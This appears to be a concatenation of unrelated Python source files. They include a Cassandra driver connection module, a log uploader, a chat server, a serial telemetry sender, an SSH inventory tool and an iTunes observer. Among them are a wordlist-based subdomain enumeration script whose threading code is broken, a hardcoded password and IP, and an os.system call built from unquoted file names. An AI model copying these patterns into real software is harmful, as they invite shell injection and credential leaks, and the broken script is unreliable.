self.send_msg(msgs[messages_sent + i],
request_id,
partial(waiter.got_response, index=messages_sent + i))
messages_sent += available
if messages_sent == len(msgs):
break
else:
if timeout is not None:
timeout -= 0.01
if timeout <= 0.0:
raise OperationTimedOut()
time.sleep(0.01)
try:
return waiter.deliver(timeout)
except OperationTimedOut:
raise
except Exception as exc:
self.defunct(exc)
raise
def register_watcher(self, event_type, callback, register_timeout=None):
"""
Register a callback for a given event type.
"""
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=[event_type]),
timeout=register_timeout)
def register_watchers(self, type_callback_dict, register_timeout=None):
"""
Register multiple callback/event type pairs, expressed as a dict.
"""
for event_type, callback in type_callback_dict.items():
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=type_callback_dict.keys()),
timeout=register_timeout)
def control_conn_disposed(self):
self.is_control_connection = False
self._push_watchers = {}
@defunct_on_error
def _read_frame_header(self):
buf = self._iobuf.getvalue()
pos = len(buf)
if pos:
version = int_from_buf_item(buf[0]) & PROTOCOL_VERSION_MASK
if version > ProtocolVersion.MAX_SUPPORTED:
raise ProtocolError("This version of the driver does not support protocol version %d" % version)
frame_header = frame_header_v3 if version >= 3 else frame_header_v1_v2
# this frame header struct is everything after the version byte
header_size = frame_header.size + 1
if pos >= header_size:
flags, stream, op, body_len = frame_header.unpack_from(buf, 1)
if body_len < 0:
raise ProtocolError("Received negative body length: %r" % body_len)
self._current_frame = _Frame(version, flags, stream, op, header_size, body_len + header_size)
return pos
def _reset_frame(self):
self._iobuf = io.BytesIO(self._iobuf.read())
self._iobuf.seek(0, 2) # io.SEEK_END == 2 (constant not present in 2.6)
self._current_frame = None
def process_io_buffer(self):
while True:
if not self._current_frame:
pos = self._read_frame_header()
else:
pos = self._iobuf.tell()
if not self._current_frame or pos < self._current_frame.end_pos:
# we don't have a complete header yet or we
# already saw a header, but we don't have a
# complete message yet
return
else:
frame = self._current_frame
self._iobuf.seek(frame.body_offset)
msg = self._iobuf.read(frame.end_pos - frame.body_offset)
self.process_msg(frame, msg)
self._reset_frame()
@defunct_on_error
def process_msg(self, header, body):
self.msg_received = True
stream_id = header.stream
if stream_id < 0:
callback = None
decoder = ProtocolHandler.decode_message
result_metadata = None
else:
try:
callback, decoder, result_metadata = self._requests.pop(stream_id)
# This can only happen if the stream_id was
# removed due to an OperationTimedOut
except KeyError:
return
with self.lock:
self.request_ids.append(stream_id)
try:
response = decoder(header.version, self.user_type_map, stream_id,
header.flags, header.opcode, body, self.decompressor, result_metadata)
except Exception as exc:
log.exception("Error decoding response from Cassandra. "
"%s; buffer: %r", header, self._iobuf.getvalue())
if callback is not None:
callback(exc)
self.defunct(exc)
return
try:
if stream_id >= 0:
if isinstance(response, ProtocolException):
if 'unsupported protocol version' in response.message:
self.is_unsupported_proto_version = True
else:
log.error("Closing connection %s due to protocol error: %s", self, response.summary_msg())
self.defunct(response)
if callback is not None:
callback(response)
else:
self.handle_pushed(response)
except Exception:
log.exception("Callback handler errored, ignoring:")
@defunct_on_error
def _send_options_message(self):
if self.cql_version is None and (not self.compression or not locally_supported_compressions):
log.debug("Not sending options message for new connection(%s) to %s "
"because compression is disabled and a cql version was not "
"specified", id(self), self.host)
self._compressor = None
self.cql_version = DEFAULT_CQL_VERSION
self._send_startup_message(no_compact=self.no_compact)
else:
log.debug("Sending initial options message for new connection (%s) to %s", id(self), self.host)
self.send_msg(OptionsMessage(), self.get_request_id(), self._handle_options_response)
@defunct_on_error
def _handle_options_response(self, options_response):
if self.is_defunct:
return
if not isinstance(options_response, SupportedMessage):
if isinstance(options_response, ConnectionException):
raise options_response
else:
log.error("Did not get expected SupportedMessage response; "
"instead, got: %s", options_response)
raise ConnectionException("Did not get expected SupportedMessage "
"response; instead, got: %s"
% (options_response,))
log.debug("Received options response on new connection (%s) from %s",
id(self), self.host)
supported_cql_versions = options_response.cql_versions
remote_supported_compressions = options_response.options['COMPRESSION']
if self.cql_version:
if self.cql_version not in supported_cql_versions:
raise ProtocolError(
"cql_version %r is not supported by remote (w/ native "
"protocol). Supported versions: %r"
% (self.cql_version, supported_cql_versions))
else:
self.cql_version = supported_cql_versions[0]
self._compressor = None
compression_type = None
if self.compression:
overlap = (set(locally_supported_compressions.keys()) &
set(remote_supported_compressions))
if len(overlap) == 0:
log.debug("No available compression types supported on both ends."
" locally supported: %r. remotely supported: %r",
locally_supported_compressions.keys(),
remote_supported_compressions)
else:
compression_type = None
if isinstance(self.compression, six.string_types):
# the user picked a specific compression type ('snappy' or 'lz4')
if self.compression not in remote_supported_compressions:
raise ProtocolError(
"The requested compression type (%s) is not supported by the Cassandra server at %s"
% (self.compression, self.host))
compression_type = self.compression
else:
# our locally supported compressions are ordered to prefer
# lz4, if available
for k in locally_supported_compressions.keys():
if k in overlap:
compression_type = k
break
# set the decompressor here, but set the compressor only after
# a successful Ready message
self._compressor, self.decompressor = \
locally_supported_compressions[compression_type]
self._send_startup_message(compression_type, no_compact=self.no_compact)
@defunct_on_error
def _send_startup_message(self, compression=None, no_compact=False):
log.debug("Sending StartupMessage on %s", self)
opts = {}
if compression:
opts['COMPRESSION'] = compression
if no_compact:
opts['NO_COMPACT'] = 'true'
sm = StartupMessage(cqlversion=self.cql_version, options=opts)
self.send_msg(sm, self.get_request_id(), cb=self._handle_startup_response)
log.debug("Sent StartupMessage on %s", self)
@defunct_on_error
def _handle_startup_response(self, startup_response, did_authenticate=False):
if self.is_defunct:
return
if isinstance(startup_response, ReadyMessage):
log.debug("Got ReadyMessage on new connection (%s) from %s", id(self), self.host)
if self._compressor:
self.compressor = self._compressor
self.connected_event.set()
elif isinstance(startup_response, AuthenticateMessage):
log.debug("Got AuthenticateMessage on new connection (%s) from %s: %s",
id(self), self.host, startup_response.authenticator)
if self.authenticator is None:
raise AuthenticationFailed('Remote end requires authentication.')
if isinstance(self.authenticator, dict):
log.debug("Sending credentials-based auth response on %s", self)
cm = CredentialsMessage(creds=self.authenticator)
callback = partial(self._handle_startup_response, did_authenticate=True)
self.send_msg(cm, self.get_request_id(), cb=callback)
else:
log.debug("Sending SASL-based auth response on %s", self)
self.authenticator.server_authenticator_class = startup_response.authenticator
initial_response = self.authenticator.initial_response()
initial_response = "" if initial_response is None else initial_response
self.send_msg(AuthResponseMessage(initial_response), self.get_request_id(), self._handle_auth_response)
elif isinstance(startup_response, ErrorMessage):
log.debug("Received ErrorMessage on new connection (%s) from %s: %s",
id(self), self.host, startup_response.summary_msg())
if did_authenticate:
raise AuthenticationFailed(
"Failed to authenticate to %s: %s" %
(self.host, startup_response.summary_msg()))
else:
raise ConnectionException(
"Failed to initialize new connection to %s: %s"
% (self.host, startup_response.summary_msg()))
elif isinstance(startup_response, ConnectionShutdown):
log.debug("Connection to %s was closed during the startup handshake", (self.host))
raise startup_response
else:
msg = "Unexpected response during Connection setup: %r"
log.error(msg, startup_response)
raise ProtocolError(msg % (startup_response,))
@defunct_on_error
def _handle_auth_response(self, auth_response):
if self.is_defunct:
return
if isinstance(auth_response, AuthSuccessMessage):
log.debug("Connection %s successfully authenticated", self)
self.authenticator.on_authentication_success(auth_response.token)
if self._compressor:
self.compressor = self._compressor
self.connected_event.set()
elif isinstance(auth_response, AuthChallengeMessage):
response = self.authenticator.evaluate_challenge(auth_response.challenge)
msg = AuthResponseMessage("" if response is None else response)
log.debug("Responding to auth challenge on %s", self)
self.send_msg(msg, self.get_request_id(), self._handle_auth_response)
elif isinstance(auth_response, ErrorMessage):
log.debug("Received ErrorMessage on new connection (%s) from %s: %s",
id(self), self.host, auth_response.summary_msg())
raise AuthenticationFailed(
"Failed to authenticate to %s: %s" %
(self.host, auth_response.summary_msg()))
elif isinstance(auth_response, ConnectionShutdown):
log.debug("Connection to %s was closed during the authentication process", self.host)
raise auth_response
else:
msg = "Unexpected response during Connection authentication to %s: %r"
log.error(msg, self.host, auth_response)
raise ProtocolError(msg % (self.host, auth_response))
def set_keyspace_blocking(self, keyspace):
if not keyspace or keyspace == self.keyspace:
return
query = QueryMessage(query='USE "%s"' % (keyspace,),
consistency_level=ConsistencyLevel.ONE)
try:
result = self.wait_for_response(query)
except InvalidRequestException as ire:
# the keyspace probably doesn't exist
raise ire.to_exception()
except Exception as exc:
conn_exc = ConnectionException(
"Problem while setting keyspace: %r" % (exc,), self.host)
self.defunct(conn_exc)
raise conn_exc
if isinstance(result, ResultMessage):
self.keyspace = keyspace
else:
conn_exc = ConnectionException(
"Problem while setting keyspace: %r" % (result,), self.host)
self.defunct(conn_exc)
raise conn_exc
def set_keyspace_async(self, keyspace, callback):
"""
Use this in order to avoid deadlocking the event loop thread.
When the operation completes, `callback` will be called with
two arguments: this connection and an Exception if an error
occurred, otherwise :const:`None`.
This method will always increment :attr:`.in_flight` attribute, even if
it doesn't need to make a request, just to maintain an
":attr:`.in_flight` is incremented" invariant.
"""
# Here we increment in_flight unconditionally, whether we need to issue
# a request or not. This is bad, but allows callers -- specifically
# _set_keyspace_for_all_conns -- to assume that we increment
# self.in_flight during this call. This allows the passed callback to
# safely call HostConnection{Pool,}.return_connection on this
# Connection.
#
# We use a busy wait on the lock here because:
# - we'll only spin if the connection is at max capacity, which is very
# unlikely for a set_keyspace call
# - it allows us to avoid signaling a condition every time a request completes
while True:
with self.lock:
if self.in_flight < self.max_request_id:
self.in_flight += 1
break
time.sleep(0.001)
if not keyspace or keyspace == self.keyspace:
callback(self, None)
return
query = QueryMessage(query='USE "%s"' % (keyspace,),
consistency_level=ConsistencyLevel.ONE)
def process_result(result):
if isinstance(result, ResultMessage):
self.keyspace = keyspace
callback(self, None)
elif isinstance(result, InvalidRequestException):
callback(self, result.to_exception())
else:
callback(self, self.defunct(ConnectionException(
"Problem while setting keyspace: %r" % (result,), self.host)))
# We've incremented self.in_flight above, so we "have permission" to
# acquire a new request id
request_id = self.get_request_id()
self.send_msg(query, request_id, process_result)
@property
def is_idle(self):
return not self.msg_received
def reset_idle(self):
self.msg_received = False
def __str__(self):
status = ""
if self.is_defunct:
status = " (defunct)"
elif self.is_closed:
status = " (closed)"
return "<%s(%r) %s:%d%s>" % (self.__class__.__name__, id(self), self.host, self.port, status)
__repr__ = __str__
class ResponseWaiter(object):
def __init__(self, connection, num_responses, fail_on_error):
self.connection = connection
self.pending = num_responses
self.fail_on_error = fail_on_error
self.error = None
self.responses = [None] * num_responses
self.event = Event()
def got_response(self, response, index):
with self.connection.lock:
self.connection.in_flight -= 1
if isinstance(response, Exception):
if hasattr(response, 'to_exception'):
response = response.to_exception()
if self.fail_on_error:
self.error = response
self.event.set()
else:
self.responses[index] = (False, response)
else:
if not self.fail_on_error:
self.responses[index] = (True, response)
else:
self.responses[index] = response
self.pending -= 1
if not self.pending:
self.event.set()
def deliver(self, timeout=None):
"""
If fail_on_error was set to False, a list of (success, response)
tuples will be returned. If success is False, response will be
an Exception. Otherwise, response will be the normal query response.
If fail_on_error was left as True and one of the requests
failed, the corresponding Exception will be raised. Otherwise,
the normal response will be returned.
"""
self.event.wait(timeout)
if self.error:
raise self.error
elif not self.event.is_set():
raise OperationTimedOut()
else:
return self.responses
class HeartbeatFuture(object):
def __init__(self, connection, owner):
self._exception = None
self._event = Event()
self.connection = connection
self.owner = owner
log.debug("Sending options message heartbeat on idle connection (%s) %s",
id(connection), connection.host)
with connection.lock:
if connection.in_flight <= connection.max_request_id:
connection.in_flight += 1
connection.send_msg(OptionsMessage(), connection.get_request_id(), self._options_callback)
else:
self._exception = Exception("Failed to send heartbeat because connection 'in_flight' exceeds threshold")
self._event.set()
def wait(self, timeout):
self._event.wait(timeout)
if self._event.is_set():
if self._exception:
raise self._exception
else:
raise OperationTimedOut("Connection heartbeat timeout after %s seconds" % (timeout,), self.connection.host)
def _options_callback(self, response):
if isinstance(response, SupportedMessage):
log.debug("Received options response on connection (%s) from %s",
id(self.connection), self.connection.host)
else:
if isinstance(response, ConnectionException):
self._exception = response
else:
self._exception = ConnectionException("Received unexpected response to OptionsMessage: %s"
% (response,))
self._event.set()
class ConnectionHeartbeat(Thread):
def __init__(self, interval_sec, get_connection_holders, timeout):
Thread.__init__(self, name="Connection heartbeat")
self._interval = interval_sec
self._timeout = timeout
self._get_connection_holders = get_connection_holders
self._shutdown_event = Event()
self.daemon = True
self.start()
class ShutdownException(Exception):
pass
def run(self):
self._shutdown_event.wait(self._interval)
while not self._shutdown_event.is_set():
start_time = time.time()
futures = []
failed_connections = []
try:
for connections, owner in [(o.get_connections(), o) for o in self._get_connection_holders()]:
for connection in connections:
self._raise_if_stopped()
if not (connection.is_defunct or connection.is_closed):
if connection.is_idle:
try:
futures.append(HeartbeatFuture(connection, owner))
except Exception as e:
log.warning("Failed sending heartbeat message on connection (%s) to %s",
id(connection), connection.host)
failed_connections.append((connection, owner, e))
else:
connection.reset_idle()
else:
log.debug("Cannot send heartbeat message on connection (%s) to %s",
id(connection), connection.host)
# make sure the owner sees this defunt/closed connection
owner.return_connection(connection)
self._raise_if_stopped()
# Wait max `self._timeout` seconds for all HeartbeatFutures to complete
timeout = self._timeout
start_time = time.time()
for f in futures:
self._raise_if_stopped()
connection = f.connection
try:
f.wait(timeout)
# TODO: move this, along with connection locks in pool, down into Connection
with connection.lock:
connection.in_flight -= 1
connection.reset_idle()
except Exception as e:
log.warning("Heartbeat failed for connection (%s) to %s",
id(connection), connection.host)
failed_connections.append((f.connection, f.owner, e))
timeout = self._timeout - (time.time() - start_time)
for connection, owner, exc in failed_connections:
self._raise_if_stopped()
if not connection.is_control_connection:
# Only HostConnection supports shutdown_on_error
owner.shutdown_on_error = True
connection.defunct(exc)
owner.return_connection(connection)
except self.ShutdownException:
pass
except Exception:
log.error("Failed connection heartbeat", exc_info=True)
elapsed = time.time() - start_time
self._shutdown_event.wait(max(self._interval - elapsed, 0.01))
def stop(self):
self._shutdown_event.set()
self.join()
def _raise_if_stopped(self):
if self._shutdown_event.is_set():
raise self.ShutdownException()
class Timer(object):
canceled = False
def __init__(self, timeout, callback):
self.end = time.time() + timeout
self.callback = callback
def __lt__(self, other):
return self.end < other.end
def cancel(self):
self.canceled = True
def finish(self, time_now):
if self.canceled:
return True
if time_now >= self.end:
self.callback()
return True
return False
class TimerManager(object):
def __init__(self):
self._queue = []
self._new_timers = []
def add_timer(self, timer):
"""
called from client thread with a Timer object
"""
self._new_timers.append((timer.end, timer))
def service_timeouts(self):
"""
run callbacks on all expired timers
Called from the event thread
:return: next end time, or None
"""
queue = self._queue
if self._new_timers:
new_timers = self._new_timers
while new_timers:
heappush(queue, new_timers.pop())
if queue:
now = time.time()
while queue:
try:
timer = queue[0][1]
if timer.finish(now):
heappop(queue)
else:
return timer.end
except Exception:
log.exception("Exception while servicing timeout callback: ")
@property
def next_timeout(self):
try:
return self._queue[0][0]
except IndexError:
pass
|
Chap10_Example10.4.py
|
from threading import *
def my_msgprint(i):
for loop in range(1,i):
print(f"{current_thread().getName()} thread running count is {loop}")
mthread = Thread(target = my_msgprint, name = 'MyChildThread', args = (5,))
mthread.start()
for i in range(1,5):
print(f"Main thread running count is {i}")
|
uploader.py
|
#!/usr/bin/env python
import os
import time
import stat
import random
import ctypes
import inspect
import requests
import traceback
import threading
from selfdrive.swaglog import cloudlog
from selfdrive.loggerd.config import DONGLE_ID, DONGLE_SECRET, ROOT
from common.api import api_get
def raise_on_thread(t, exctype):
for ctid, tobj in threading._active.items():
if tobj is t:
tid = ctid
break
else:
raise Exception("Could not find thread")
'''Raises an exception in the threads with id tid'''
if not inspect.isclass(exctype):
raise TypeError("Only types can be raised (not instances)")
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid),
ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# "if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, 0)
raise SystemError("PyThreadState_SetAsyncExc failed")
def listdir_with_creation_date(d):
lst = os.listdir(d)
for fn in lst:
try:
st = os.stat(os.path.join(d, fn))
ctime = st[stat.ST_CTIME]
yield (ctime, fn)
except OSError:
cloudlog.exception("listdir_with_creation_date: stat failed?")
yield (None, fn)
def listdir_by_creation_date(d):
times_and_paths = list(listdir_with_creation_date(d))
return [path for _, path in sorted(times_and_paths)]
def clear_locks(root):
for logname in os.listdir(root):
path = os.path.join(root, logname)
try:
for fname in os.listdir(path):
if fname.endswith(".lock"):
os.unlink(os.path.join(path, fname))
except OSError:
cloudlog.exception("clear_locks failed")
class Uploader(object):
def __init__(self, dongle_id, dongle_secret, root):
self.dongle_id = dongle_id
self.dongle_secret = dongle_secret
self.root = root
self.upload_thread = None
self.last_resp = None
self.last_exc = None
def clean_dirs(self):
try:
for logname in os.listdir(self.root):
path = os.path.join(self.root, logname)
# remove empty directories
if not os.listdir(path):
os.rmdir(path)
except OSError:
cloudlog.exception("clean_dirs failed")
def gen_upload_files(self):
for logname in listdir_by_creation_date(self.root):
path = os.path.join(self.root, logname)
names = os.listdir(path)
if any(name.endswith(".lock") for name in names):
continue
for name in names:
key = os.path.join(logname, name)
fn = os.path.join(path, name)
yield (name, key, fn)
def next_file_to_upload(self):
# try to upload log files first
for name, key, fn in self.gen_upload_files():
if name in ["rlog", "rlog.bz2"]:
return (key, fn, 0)
# then upload camera files no not on wifi
for name, key, fn in self.gen_upload_files():
if not name.endswith('.lock') and not name.endswith(".tmp"):
return (key, fn, 1)
return None
def do_upload(self, key, fn):
try:
url_resp = api_get("upload_url", timeout=2,
id=self.dongle_id, secret=self.dongle_secret,
path=key)
url = url_resp.text
cloudlog.info({"upload_url", url})
with open(fn, "rb") as f:
self.last_resp = requests.put(url, data=f)
except Exception as e:
self.last_exc = (e, traceback.format_exc())
raise
def normal_upload(self, key, fn):
self.last_resp = None
self.last_exc = None
try:
self.do_upload(key, fn)
except Exception:
pass
return self.last_resp
def killable_upload(self, key, fn):
self.last_resp = None
self.last_exc = None
self.upload_thread = threading.Thread(target=lambda: self.do_upload(key, fn))
self.upload_thread.start()
self.upload_thread.join()
self.upload_thread = None
return self.last_resp
def abort_upload(self):
thread = self.upload_thread
if thread is None:
return
if not thread.is_alive():
return
raise_on_thread(thread, SystemExit)
thread.join()
def upload(self, key, fn):
# write out the bz2 compress
if fn.endswith("log"):
ext = ".bz2"
cloudlog.info("compressing %r to %r", fn, fn+ext)
if os.system("nice -n 19 bzip2 -c %s > %s.tmp && mv %s.tmp %s%s && rm %s" % (fn, fn, fn, fn, ext, fn)) != 0:
cloudlog.exception("upload: bzip2 compression failed")
return False
# assuming file is named properly
key += ext
fn += ext
try:
sz = os.path.getsize(fn)
except OSError:
cloudlog.exception("upload: getsize failed")
return False
cloudlog.event("upload", key=key, fn=fn, sz=sz)
cloudlog.info("checking %r with size %r", key, sz)
if sz == 0:
# can't upload files of 0 size
os.unlink(fn) # delete the file
success = True
else:
cloudlog.info("uploading %r", fn)
# stat = self.killable_upload(key, fn)
stat = self.normal_upload(key, fn)
if stat is not None and stat.status_code == 200:
cloudlog.event("upload_success", key=key, fn=fn, sz=sz)
os.unlink(fn) # delete the file
success = True
else:
cloudlog.event("upload_failed", stat=stat, exc=self.last_exc, key=key, fn=fn, sz=sz)
success = False
self.clean_dirs()
return success
def uploader_fn(exit_event):
cloudlog.info("uploader_fn")
uploader = Uploader(DONGLE_ID, DONGLE_SECRET, ROOT)
while True:
backoff = 0.1
while True:
if exit_event.is_set():
return
d = uploader.next_file_to_upload()
if d is None:
break
key, fn, _ = d
cloudlog.info("to upload %r", d)
success = uploader.upload(key, fn)
if success:
backoff = 0.1
else:
cloudlog.info("backoff %r", backoff)
time.sleep(backoff + random.uniform(0, backoff))
backoff *= 2
cloudlog.info("upload done, success=%r", success)
time.sleep(5)
def main(gctx=None):
uploader_fn(threading.Event())
if __name__ == "__main__":
main()
|
server.py
|
import socket
import sys
import time
import threading
x = socket.socket()
h_name= socket.gethostname()
print("server will start on host: ", h_name)
port= 1234
x.bind((h_name, port))
print( "server done binding to host and port successfully")
print("server is waiting for incoming connections")
x.listen()
connection,address= x.accept()
print(address, " Has connected to the server and is now online...")
print("You can now start sending messages")
def send():
while 1:
display_mess= input(str())
display_mess=display_mess.encode()
connection.send(display_mess)
def recv():
while 1:
in_message=connection.recv(1024)
in_messagge=in_message.decode()
print("Client:", in_message.decode())
threading.Thread(target=send).start()
threading.Thread(target=recv).start()
|
main2.py
|
import serial
import requests
import json
import time
import threading
def worker(end_point, data):
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
try:
r = requests.post('http://78.160.156.154:8000/api/{}/'.format(end_point), data=json.dumps(data), headers=headers)
except:
print("Data didnt send!")
bms = serial.Serial('/dev/tty.usbmodem1451',9600)
while 1:
print(' ')
row_data = bms.readline()
clear_data = row_data.decode("utf-8")
try:
opcode = clear_data[:1]
print(opcode)
except:
continue
if opcode == 'i':
if clear_data == None:
continue
try:
isi = clear_data[2:]
temperature_data = {"username": "car", "password": "yusufmerhaba", "engine_temperature":isi}
temperature_thread = threading.Thread(target=worker, args=("temperature", temperature_data))
temperature_thread.start()
except:
continue
print('Isi').format(isi)
if opcode == 'h':
try:
print(clear_data[1:])
hiz = float(clear_data[1:])
velocity_data = {"username": "car", "password": "yusufmerhaba", "velocity": hiz}
velocity_thread = threading.Thread(target=worker, args=("velocity", velocity_data))
velocity_thread.start()
except:
continue
print('speed: {}'.format(hiz))
time.sleep(0.2)
|
subdomainfinder.py
|
import requests
import threading
domain = input("Enter domain: ")
file = open('wordlist.txt','r')
content = file.read()
subdomains = content.splitlines()
for subdomain in subdomains:
url1 = f"http://{subdomain}.{domain}"
url2 = f"https://{subdomain}.{domain}"
try:
requests.get(url1)
print(f"Discovered URL: {url1}")
requests.get(url2)
print(f"Discovered URL: {url2}")
except requests.ConnectionError:
pass
for subdomains in range():
thread = threading.Thread(target=domain, args = 100)
thread.start()
|
__main__.py
|
import sys
import argparse
import ipaddress
import threading
from queue import Queue
import socket
import paramiko
from pynventory.hosts import LinuxHost
parser = argparse.ArgumentParser(description='Create a DokuWiki friendly inventory table or system hostfile of your '
'servers',
usage='pynventory 192.168.1.0/24 --hostname --cpu_cores --memory')
parser.add_argument('ip_range', action='store', help='CIDR IP range. ie: 192.168.0.0/24')
parser.add_argument('--format',
action='store',
help='Choose the output format. Option "hostfile" ignores all additional checks but forces '
'--hostname',
choices=['dokuwiki', 'hostfile'],
default='dokuwiki')
parser.add_argument('--cpu_cores', action='append_const', const=LinuxHost.GetCpuCores, dest='host_checks')
parser.add_argument('--hostname', action='append_const', const=LinuxHost.GetHostname, dest='host_checks')
parser.add_argument('--os_version', action='append_const', const=LinuxHost.GetOsRelease, dest='host_checks')
parser.add_argument('--ntp_host', action='append_const', const=LinuxHost.GetNtpServer, dest='host_checks')
parser.add_argument('--memory', action='append_const', const=LinuxHost.GetMemory, dest='host_checks')
parser.add_argument('--disk', action='append_const', const=LinuxHost.GetDiskSize, dest='host_checks')
parser.add_argument('--kernel', action='append_const', const=LinuxHost.GetKernelVersion, dest='host_checks')
parser.add_argument('--link_host',
action='store',
dest='link_host',
default=False,
help='create link to a new page for host description with this as base url')
parser.add_argument('--link_empty_host',
action='store_true',
default=False,
help='create links for nonexistent hosts')
parser.add_argument('--user', action='store', dest='ssh_user', help='ssh user', default='root')
parser.add_argument('--report_errors',
action='store_true',
dest='report_errors',
help='Report connection failures (except for timeout) to stdout')
parser.add_argument('-d', action='store_true', dest='debug', help='enable verbose output to stderr')
args = parser.parse_args()
# Defining globals
# Creating queue
compress_queue = Queue()
# Main result list.
result = []
def check_host(host):
if not args.debug:
print('.', end='', file=sys.stderr, flush=True)
if args.format == "hostfile":
args.host_checks = [LinuxHost.GetHostname, ]
try:
i = LinuxHost(host, args.ssh_user)
host_result = [i, ]
for check in args.host_checks:
host_result.append(check(i))
if args.debug:
print('Host: %s Ok' % host, file=sys.stderr)
except paramiko.ssh_exception.NoValidConnectionsError as e:
# NoValidConnection wraps all socket related exceptions socket.error
empty_list = ['' for _ in range(len(args.host_checks))]
if args.report_errors:
empty_list[0] = 'Error: ' + ' '.join(str(e).split()[2:8])
host_result = [host, ] + empty_list
except socket.timeout as e:
# Don't report socket timeouts
empty_list = ['' for _ in range(len(args.host_checks))]
host_result = [host, ] + empty_list
if args.debug:
print('Host: %s Error: %s' % (host, e), file=sys.stderr)
except (paramiko.ssh_exception.AuthenticationException, Exception) as e:
# Catch all paramiko Auth exceptions
empty_list = ['' for _ in range(len(args.host_checks))]
if args.report_errors:
empty_list[0] = 'Error: ' + str(e)
host_result = [host, ] + empty_list
finally:
result.append(host_result)
return
def process_queue():
while True:
host_data = compress_queue.get()
check_host(host_data)
compress_queue.task_done()
def format_dokuwiki(host_result):
header_title = ['Host', ] + [check.display_name() for check in args.host_checks]
# Convert all the cells into strings
cells = [[str(cell) for cell in row] for row in [header_title, ] + host_result]
# create link to hosts if arg is set
if args.link_host:
for row in cells[1:]:
# Only create a link if the host exists or the flag is set
if row[1] or args.link_empty_host:
row[0] = f'[[{args.link_host}:{row[0]}|{row[0]}]]'
# Get the longest entry for every column
column_length = [max(map(len, col)) for col in zip(*cells)]
# Create spacing for cells
format_header = '^ {} ^'.format(' ^ '.join('{{:{}}}'.format(length) for length in column_length))
format_body = '| {} |'.format(' | '.join('{{:{}}}'.format(length) for length in column_length))
# Print output...
print(format_header.format(*header_title))
for row in cells[1:]:
print(format_body.format(*row))
def format_hostfile(host_result):
for host in host_result:
if host[1]:
print(host[0], host[1])
def main():
# Exit if no checks are given
if not args.host_checks and args.format == "dokuwiki":
parser.print_help()
exit(1)
# Starting threads
threads = 10
for _ in range(threads):
t = threading.Thread(target=process_queue)
t.daemon = True
t.start()
try:
# Providing threads with work
ip_range = ipaddress.ip_network(args.ip_range)
except ValueError as e:
print(f"Failed to parse the provided network with error: {e}")
exit(1)
# Ignore Network and Broadcast addresses
skipp_addresses = [ip_range.network_address, ip_range.broadcast_address]
for host in ip_range:
if host in skipp_addresses:
continue
compress_queue.put(str(host))
# Wait for queue to finish
compress_queue.join()
# Force a clean line break before output
print(file=sys.stderr)
# Results from queues are not sorted.
host_result = sorted(result[1:], key=lambda a: int(str(a[0]).split('.')[3]))
if args.format == "dokuwiki":
format_dokuwiki(host_result)
if args.format == "hostfile":
format_hostfile(host_result)
if __name__ == '__main__':
main()
|
com.py
|
from ctypes import byref, oledll, windll
from ctypes.wintypes import DWORD, HANDLE
import logging
import threading
from comtypes import CoInitializeEx, CoUninitialize
from comtypes.client import CreateObject, GetEvents
import psutil
__all__ = (
'ITUNES_PLAYER', 'ITUNES_PLAYER_STATE_STOPPED', 'ITUNES_PLAYER_STATE_PLAYING',
'is_itunes_running', 'ITunesObserver', 'PlayersObserver',
)
################################################################################################################################################################
CloseHandle = windll.kernel32.CloseHandle
CoWaitForMultipleHandles = oledll.ole32.CoWaitForMultipleHandles
CreateEventW = windll.kernel32.CreateEventW
FindWindowW = windll.user32.FindWindowW
ResetEvent = windll.kernel32.ResetEvent
logger = logging.getLogger(__name__)
################################################################################################################################################################
ITUNES_PLAYER = 'iTunes'
ITUNES_PLAYER_STATE_STOPPED = 0
ITUNES_PLAYER_STATE_PLAYING = 1
################################################################################################################################################################
def is_itunes_running():
# Unfortunately, iTunes doesn't register itself against the ROT, so we must resort to cruder evidence…
return (
FindWindowW('iTunesApp', 'iTunes') and
FindWindowW('iTunes', 'iTunes') and
any((p.name() == 'iTunes.exe') for p in psutil.process_iter())
)
class ITunesObserver:
__slots__ = ('_npn', '_parent', '_app', '_connection')
def __init__(self, npn, parent):
self._npn = npn
self._parent = parent
self._app = CreateObject('iTunes.Application')
logger.info('Subscribing to «iTunes» events…')
self._connection = GetEvents(self._app, self)
def _IiTunesEvents_OnPlayerPlayEvent(self, track):
self.update(track)
def _IiTunesEvents_OnPlayerStopEvent(self, track):
self.update(track)
def _IiTunesEvents_OnPlayerPlayingTrackChangedEvent(self, track):
self.update(track)
def _IiTunesEvents_OnQuittingEvent(self):
self._parent.unregister(self)
def _IiTunesEvents_OnAboutToPromptUserToQuitEvent(self):
self._parent.unregister(self)
def update(self, track):
if self._app.PlayerState == ITUNES_PLAYER_STATE_PLAYING:
(artist, title) = (track.Artist, track.Name)
logger.info('«iTunes» notified us that it is now playing «{0:s}» by «{1:s}»…'.format(title, artist))
self._npn.notify(ITUNES_PLAYER, (artist, title))
elif self._app.PlayerState == ITUNES_PLAYER_STATE_STOPPED:
logger.info('«iTunes» notified us that it is no longer playing anything…')
self._npn.notify(ITUNES_PLAYER, None)
def close(self):
logger.info('Unsubscribing from «iTunes» events…')
del self._connection
del self._app
self._npn.notify(ITUNES_PLAYER, None)
class PlayersObserver:
__slots__ = ('_players', '_terminating', '_thread')
def __init__(self, npn):
self._players = {}
self._terminating = threading.Event()
def event_loop():
CoInitializeEx()
hevt_dummy = CreateEventW(None, True, False, 'Dummy')
p_handles = (HANDLE * 1)(hevt_dummy)
lpdw_index = byref(DWORD())
try:
while not self._terminating.is_set():
if ITunesObserver not in self._players:
if is_itunes_running():
self._players[ITunesObserver] = ITunesObserver(npn, self)
elif self._players[ITunesObserver] is None:
del self._players[ITunesObserver]
ResetEvent(hevt_dummy) # … in case some joker decides to set it…
try:
CoWaitForMultipleHandles(0, 2000, len(p_handles), p_handles, lpdw_index)
except OSError as err:
if err.winerror != -2147417835: # RPC_S_CALLPENDING
raise
finally:
CloseHandle(hevt_dummy)
for player in self._players.values():
player.close()
CoUninitialize()
self._thread = threading.Thread(target=event_loop, name='COMPlayersObserverThread')
self._thread.start()
def close(self):
self._terminating.set()
self._thread.join()
def unregister(self, player):
assert threading.current_thread() is self._thread
Player = type(player)
assert Player in self._players
assert self._players[Player] is player
player.close()
